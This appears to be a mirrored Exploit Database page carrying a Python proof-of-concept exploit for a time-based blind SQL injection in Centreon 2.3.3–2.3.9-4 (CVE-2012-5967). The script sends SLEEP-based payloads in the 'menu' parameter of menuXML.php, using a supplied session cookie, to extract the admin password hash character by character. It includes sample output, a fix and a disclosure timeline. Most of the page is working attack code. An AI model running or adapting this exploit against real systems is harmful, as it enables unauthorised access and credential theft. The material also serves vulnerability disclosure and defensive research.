Centreon Enterprise Server 2.3.3 < 2.3.9-4 - Blind SQL Injection

Exploit Database
126 阅读

作者： modpr0be

日期： 2012-12-13
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/23362/

100

101

102

103

104

#!/usr/bin/env python

# Exploit Title: Centreon 2.3.3 - 2.3.9-4 menuXML.php Blind SQL Injection Exploit

# Disclosure Date: December 12, 2012

# Author: modpr0be (@modpr0be)

# Platform: Linux

# Tested on: Centreon Enterprise Server with Centreon 2.3.9-4 on CentOS 5.5 x86_64 (Final)

# Software Link: http://www.centreon.com/Content-Download/download-centreon-enterprise-server

# References: http://www.spentera.com/2012/12/centreon-enterprise-server-blind-sql-injection/

# CVE-ID: CVE-2012-5967

### DISCLAIMER

# Script provided 'as is', without any warranty.

# For educational purposes only.

# Do not use this code to do anything illegal.

### Software Description

# The Centreon Software Suite is a set of modular software programs designed for managing

# and controlling your information systems. It lets you supervise and measure performance and

# quality of service so that you can optimise the use of your resources.

### Vulnerability Details

# Vulnerability found in menuXML.php inside the 'menu' parameter. By injecting payload after the

# menu parameter, e.g: 'AND SLEEP(5) AND 'meHL'='meHL, the web application hung for 5 seconds,

# which gives us a conclusion that the web application is vulnerable to time-based sql injection.

## Further notes:

# User with low privilege access (e.g: guest user) can still exploit this vulnerability

# The script below is for PoC of the vulnerability only.

#-=] Centreon 2.3.3 - 2.3.9-4 Time-based BlindSQLi Exploit [=-

# [ by modpr0be- research[at]spentera.com ]

# (!) We need the target IP: 172.16.199.150

# (!) Put the value of a valid PHPSESSID session: 3uh52mtl1hlmsha4nmkftde5l3

# (-) Using Time-Based method with 1s delay. This will take some time, go grab a coffee..

# (!) Getting admin password hash: 2995cb0650c5f107230ed569a8c4d6e5

# (-) Done! Admin password hash extracted in 676 seconds

### Solution

# Update to Centreon 2.4.0 or newer.

### Disclosure timeline

# 10/26/2012 - Bug found and reported to CERT/CC

# 12/07/2012 - Update from CERT/CC to publish on 12/12/2012

# 12/12/2012 - Security advisory released via CERT/CC

import sys,time,urllib,urllib2

print """

-=] Centreon 2.3.3 - 2.3.9-4 Time-based BlindSQLi Exploit [=-

[ by modpr0be- research[at]spentera.com ]

"""

host = raw_input("(!) We need the target IP: ")

target = 'http://%s/centreon/menu/xml/menuXML.php' %(host)

# sid is the same as PHPSESSID session value, so put the value of PHPSESSID here

sid = raw_input("(!) Put the value of a valid PHPSESSID session: ")

cookie = 'PHPSESSID=%s' %(sid)

# SQLi delay, tested on LAN environment.

# Consider if it's a remote target, you may increase the delay value (default: 1 seconds)

delay=1

print "(-) Using Time-Based method with %ds delay. This will take some time, go grab a coffee..\n"%int(delay)

def Hex2Des(item):

return ord(hex(item).replace('0x',''))

def adminhash(m,n):

#borrow from SQLmap :)

adminquery=("' AND 9999=IF((ORD(MID((SELECT IFNULL(CAST(contact_passwd AS CHAR),0x20) FROM contact"

" WHERE contact_id=1 LIMIT 0,1),%s,1)) > %s),SLEEP(%s),9999)AND 'mEhL'='mEhL" %(m,n,delay))

value = { 'menu': '2'+adminquery,

'sid': '%s'%(sid)}

url = "%s?%s" %(target,urllib.urlencode(value))

req = urllib2.Request(url)

req.add_header('Cookie', cookie)

try:

starttime=time.time()

response = urllib2.urlopen(req)

endtime = time.time()

return int(endtime-starttime)

except:

print '\n(-) Uh oh! Exploit fail..'

sys.exit(0)

sys.stdout.write('(!) Getting admin password hash: ')

sys.stdout.flush()

starttime = time.time()

for m in range(1,33):

for n in range(0,16):

wkttunggu = adminhash(m,Hex2Des(n))

if (wkttunggu < delay):

sys.stdout.write(chr(Hex2Des(n)))

sys.stdout.flush()

break

endtime = time.time()

print "\n(-) Done! Admin password hash extracted in %d seconds" %int(endtime-starttime)